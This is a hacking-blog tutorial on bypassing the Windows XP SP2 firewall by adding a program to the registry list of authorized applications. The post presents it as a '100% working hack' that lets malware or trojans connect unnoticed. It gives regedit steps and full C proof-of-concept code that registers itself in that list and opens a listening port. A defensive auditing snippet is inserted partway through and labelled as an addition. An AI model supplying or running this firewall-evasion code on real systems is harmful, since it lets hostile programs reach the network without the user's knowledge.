
How to Bypass Windows XP Firewall using C program


Hello friends, today I will share with you a technique for bypassing the Windows XP Service Pack 2 firewall. It's a 100% working hack, and it is basically an exploit in Windows XP.
This technique relies on a vulnerability found in the Windows XP SP2 firewall.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to the Firewall's registry keys allows local attackers to bypass the Firewall's blocking list and allows a malicious program to connect to the network.

Credit :-
The information has been provided by Mark Kica.

Vulnerable Systems :-
* Microsoft Windows XP SP2

Windows XP SP2 Firewall keeps a list of allowed programs in the registry, and this list is not properly protected from modification by a malicious local attacker. If an attacker adds a new key to the registry address of
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
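
For anyone auditing this key on the defensive side: the value data above has the shape path:scope:state:name, and the path carries its own colon, so it has to be split from the right. The C code below is an added example, not part of the original post or of Mark Kica's code; the trusted-prefix list, the review heuristics and the function names are assumptions made for illustration, and it assumes the friendly name contains no colon.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

struct fw_entry { char path[260], scope[128], name[128]; int enabled; };
/* Trusted install prefixes: an assumption for this example, tune per site. */
static const char *TRUSTED[] = { "%windir%\\", "C:\\WINDOWS\\", "C:\\Program Files\\" };

/* Case-insensitive compare of at most n characters; 1 when equal. */
static int ieq_n(const char *a, const char *b, size_t n) {
    for (; n > 0 && tolower((unsigned char)*a) == tolower((unsigned char)*b); a++, b++, n--)
        if (*a == '\0') return 1;
    return n == 0;
}

/* Split "path:scope:state:name" from the right; 0 on success, -1 if malformed. */
int parse_entry(const char *data, struct fw_entry *e) {
    char tmp[512], *f[3];
    if (strlen(data) >= sizeof tmp) return -1;
    strcpy(tmp, data);
    for (int i = 2; i >= 0; i--) {        /* peel off name, state, scope */
        char *c = strrchr(tmp, ':');
        if (c == NULL) return -1;
        *c = '\0'; f[i] = c + 1;
    }
    if (!tmp[0] || strlen(tmp) >= sizeof e->path ||
        strlen(f[0]) >= sizeof e->scope || strlen(f[2]) >= sizeof e->name) return -1;
    if (!ieq_n(f[1], "enabled", 8) && !ieq_n(f[1], "disabled", 9)) return -1;
    e->enabled = ieq_n(f[1], "enabled", 8);
    strcpy(e->path, tmp); strcpy(e->scope, f[0]); strcpy(e->name, f[2]);
    return 0;
}

/* 1 = review, 0 = ok, -1 = malformed. Reviewed when enabled and: value name
   differs from path, path contains "..", or scope is "*" outside TRUSTED. */
int needs_review(const char *value_name, const char *data) {
    struct fw_entry e;
    if (parse_entry(data, &e) != 0) return -1;
    if (!e.enabled) return 0;
    if (!ieq_n(value_name, e.path, sizeof e.path) || strstr(e.path, "..")) return 1;
    if (strcmp(e.scope, "*") != 0) return 0;
    for (size_t i = 0; i < sizeof TRUSTED / sizeof TRUSTED[0]; i++)
        if (ieq_n(e.path, TRUSTED[i], strlen(TRUSTED[i]))) return 0;
    return 1;
}

int main(void) {   /* value data below is the sample entry from the post */
    printf("%d\n", needs_review("C:\\chat.exe", "C:\\chat.exe:*:Enabled:chat"));
    return 0;
}
```

Feed it the name and data of each value exported from the List key; entries that return 1 or -1 are the ones to check by hand.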

Source Code :-

    #include <stdio.h>
    #include <string.h>
    #include <windows.h>
    #include <ezsocket.h>   /* socket helper header the PoC depends on; not part of the Windows SDK */
    #include <conio.h>
    #include "Shlwapi.h"

    int main( int argc, char *argv [] )
    {
        char buffer[1024];
        char filename[1024];

        HKEY hKey;
        int i;
        int temp, sockfd, new_fd, fd_size;
        struct sockaddr_in remote_addr;

        /* Build the value data "<path of this exe>:*:Enabled:bugg" */
        GetModuleFileName(NULL, filename, 1024);
        strcpy(buffer, filename);
        strcat(buffer, ":*:Enabled:");
        strcat(buffer, "bugg");

        /* Open the firewall's list of authorized applications
           (fails if the process has no write access to this HKLM key) */
        if (RegOpenKeyEx(
                HKEY_LOCAL_MACHINE,
                "SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
                0,
                KEY_ALL_ACCESS,
                &hKey) != ERROR_SUCCESS)
            return 1;

        /* Add this program to the list: value name = path, data = buffer */
        RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)buffer, strlen(buffer) + 1);

        fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
        fprintf(stdout, " This is not trojan \n");
        fprintf(stdout, " Opened port is :2001 \n");
        fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
        fprintf(stdout, "Dedicated to Katka H. from Levoca \n");

        if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
            return 0;

        for (; ; )
        {
            /* Remove the entry again once the socket is listening */
            RegDeleteValue(hKey, filename);
            fd_size = sizeof(struct sockaddr_in);

            if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
                continue;
            temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
            fprintf(stdout, "Sended: Hello World\r\n");
            /* Leave room for the terminator and guard against a failed recv */
            temp = recv(new_fd, buffer, sizeof(buffer) - 1, 0);
            if (temp < 0)
                temp = 0;
            buffer[temp] = '\0';
            fprintf(stdout, "Recieved: %s\r\n", buffer);
            /* Note: buffer now holds the received text, not the original value data */
            RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)buffer, strlen(buffer) + 1);

            if (!strcmp(buffer, "quit"))
                break;
        }

        return 0;
    }

    /* EoF */

Here we are just manipulating registry values using this program.
I hope you all liked it. If you have any queries, ask me in the form of a comment.

About Lokesh Singh

Hello friends, I am Lokesh Singh, a certified ethical hacker (CEH, SSA, CSIF, CISSP). I have 8+ years of extensive experience in the ethical hacking, cyber security and penetration testing domains.
